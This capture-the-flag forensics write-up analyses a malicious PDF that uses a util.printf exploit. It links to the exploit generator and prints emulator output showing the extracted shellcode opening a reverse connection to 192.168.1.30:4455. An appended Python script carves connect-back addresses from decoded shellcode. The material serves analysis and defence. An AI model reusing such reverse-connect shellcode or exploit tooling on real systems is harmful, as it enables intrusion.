Tags: pdf forensic 

## Pt. 2

For this part, we need to find out the attacker's IP. As there is no connection info in the Autopsy report, I eventually realized that the PDF itself must contain the attacker's IP in order to send something back to him.

I found this [file](https://github.com/mobmewireless/origami-pdf/blob/master/samples/exploits/cve-2008-2992-utilprintf.rb) that was used to create the pdf but I was not able to find out how to extract the shellcode out of it at first sight. Then I searched a little more and found this [website](https://www.adlice.com/infected-pdf-extract-payload/).

Before using that one, I first wanted to try to do it with https://github.com/PCsXcetra/DerbyCon-2019Files which did not work...

To finally solve the challenge, I installed [PDFStreamDumper](http://sandsprite.com/blogs/index.php?pid=57&uid=7) and highlighted the shellcode inside the PDF (one of the objects listed on the left).

Then I opened the JavaScript UI to analyze the shellcode.

I ran it and got the IP as the output!

```
Loaded 400 bytes from file sample.sc
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

401348 LoadLibraryA(ws2_32)
401358 WSAStartup(190)
401375 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07

Stepcount 2000001
```

Solved!
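As an added example that is not part of the original writeup, the same connect-back address can be carved statically instead of emulating the shellcode: decode the `unescape("%u....")` string from the (already decompressed) JavaScript stream, then look for the byte pattern many reverse-connect stubs use to push a `sockaddr_in` (a 32-bit IP push followed by a push of `AF_INET` and the big-endian port). The JavaScript and the byte fragment below are constructed for the example, not taken from the challenge file.

```python
import re
import socket
import struct
from typing import List, Tuple

# Constructed sample: what a util.printf-style exploit's script might look like
# once dumped from the PDF. The second literal is a hand-made fragment, not real
# shellcode; it only pushes a sockaddr_in for 192.168.1.30:4455 the way
# reverse-connect stubs commonly do (push imm32 IP; push AF_INET + port).
SAMPLE_JS = (
    'var sled = unescape("%u9090%u9090");\n'
    'var sc = unescape("%uc068%u01a8%u681e%u0002%u6711");\n'
    'var buf = sled + sc;\n'
)

def decode_unescape(text: str) -> bytes:
    """Decode JavaScript %uXXXX (UTF-16 code unit, little-endian) and %XX escapes."""
    out = bytearray()
    for m in re.finditer(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})', text):
        if m.group(1):
            out += struct.pack('<H', int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)

def extract_shellcode(js: str) -> bytes:
    """Concatenate and decode every unescape('...') literal in script order."""
    parts = re.findall(r'unescape\(\s*(["\'])(.*?)\1\s*\)', js, re.DOTALL)
    return b"".join(decode_unescape(body) for _, body in parts)

# 68 <ip, 4 bytes> 68 02 00 <port, 2 bytes big-endian>
#   push imm32 (IP)  push imm32 (sin_family=AF_INET little-endian, sin_port)
SOCKADDR_PUSH = re.compile(rb'\x68(.{4})\x68\x02\x00(.{2})', re.DOTALL)

def find_callbacks(shellcode: bytes) -> List[Tuple[str, int]]:
    """Return every (ip, port) pair that matches the sockaddr_in push pattern."""
    hits = []
    for m in SOCKADDR_PUSH.finditer(shellcode):
        ip = socket.inet_ntoa(m.group(1))
        port = struct.unpack('>H', m.group(2))[0]
        hits.append((ip, port))
    return hits

if __name__ == "__main__":
    sc = extract_shellcode(SAMPLE_JS)
    print(f"decoded {len(sc)} bytes: {sc.hex()}")
    for ip, port in find_callbacks(sc):
        print(f"candidate callback: {ip}:{port}")
```

A miss here only means the stub uses another layout (encoded payload, `push word` sequences, or a staged downloader), so the emulator run above remains the authoritative check.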

Original writeup (https://github.com/xXLeoXxOne/writeups/blob/main/CrewCTF%202022/PolicyViolation.md).